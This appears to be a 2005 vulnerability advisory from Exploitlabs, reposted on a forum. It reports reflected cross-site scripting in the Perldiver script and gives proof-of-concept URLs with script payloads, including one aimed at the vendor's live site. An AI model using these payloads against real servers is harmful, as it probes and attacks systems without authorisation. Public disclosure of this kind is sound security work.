The following discusses a potential security vulnerability affecting one of your products. We are bringing it to your attention in order to assist you in investigating it and determining the appropriate actions, and have provided preliminary information about the potential vulnerability below. Please read our disclosure policy, available at http://www.exploitlabs.com/disclosure-policy.html if you have any questions. Please note the section under "Phases" Please confirm using the contact information I have provided below that
you have received this note.

We look forward to working with you,

Exploitlabs Research Team
Donnie werner http://exploitlabs.com

- EXPL-A-2005-014 exploitlabs.com Advisory 043 -perldiver -

AFFECTED PRODUCTS
=================
Perldiver v1.x and 2.x
http://scriptsolutions.com/

OVERVIEW
========
Perl Diver digs into your server's perl installation and giving you the information you need and quick and easy to find manner.

DETAILS
=======
1. XSS

Perldiver does not properly filter malicious script content. XSS my be inserted in the "module" parameter. ( v2.x ) or as a GET request in the main script ( v1.x )

The malicious script is the rendered and is executed in the context of the users brower.

POC
===

1.x
------
http://[host]/[path]/perldiver.pl?testhere<SCRIPT>alert(document.domain);</SCRIPT>


2.x
------
http://[host]/[path]/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script>

bonus vendor site vuln:
http://www.scriptsolutions.com/programs/free/perldiver/perldiver.cgi?action=2020&module=<script>document.write(document.domain)</script>

SOLUTION:
=========
vendor contact:
http://www.scriptsolutions.com/support/postlist.pl?Cat=&Board=DDBugs
no response Sept 14, 2005

Credits
=======
This vulnerability was discovered and researched by Donnie werner of exploitlabs

mail: wood at exploitlabs.com
mail: morning_wood at zone-h.org
--
web: http://exploitlabs.com
web: http://zone-h.org

Edited by Programmer (11/06/05 12:24 PM)

Post Extras